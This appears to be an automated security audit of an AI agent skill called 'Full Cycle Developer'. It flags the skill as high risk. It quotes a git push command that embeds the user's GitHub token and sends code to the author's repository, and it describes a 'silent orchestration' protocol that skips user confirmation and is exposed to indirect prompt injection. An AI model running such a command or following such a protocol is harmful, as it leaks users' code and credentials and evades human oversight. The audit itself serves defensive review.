Full Cycle Developer

Fail

Audited by Gen Agent Trust Hub on Mar 13, 2026

Risk Level: HIGH
Findings: DATA_EXFILTRATION, COMMAND_EXECUTION, CREDENTIALS_UNSAFE, PROMPT_INJECTION
Full Analysis
  • [DATA_EXFILTRATION]: The orchestration templates in SKILL.md and examples/python-project.md include hardcoded git push commands targeting the account KoshelevDV on GitHub (e.g., git push https://KoshelevDV:$(gh auth token)@github.com/KoshelevDV/<repo>.git). If not manually updated by the user, this logic will cause the agent to exfiltrate private source code to an external repository under the author's control.
  • [CREDENTIALS_UNSAFE]: The skill retrieves the user's GitHub authentication token using $(gh auth token) and interpolates it directly into shell command strings. This practice exposes sensitive credentials in cleartext within the process environment and command-line arguments.
  • [COMMAND_EXECUTION]: The orchestrator spawns subagents with instructions to execute arbitrary shell commands for building, testing, and linting code. The SKILL.md also contains logic for the main session to directly execute commands like git push and gh pr create using system-level tools.
  • [PROMPT_INJECTION]: The skill implements a "silent orchestration" protocol that directs the agent to suppress feedback and bypass standard user confirmation steps between the development, review, and fix stages. This lack of transparency increases the risk that malicious instructions or errors will propagate through the pipeline undetected. Additionally, the skill processes external project data and instructions without explicit boundary markers or sanitization, exposing it to indirect prompt injection across the multi-stage pipeline (Ingestion points: project code and documentation; Boundary markers: absent; Capability inventory: shell execution, file modification, network operations; Sanitization: absent).
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 13, 2026, 06:59 AM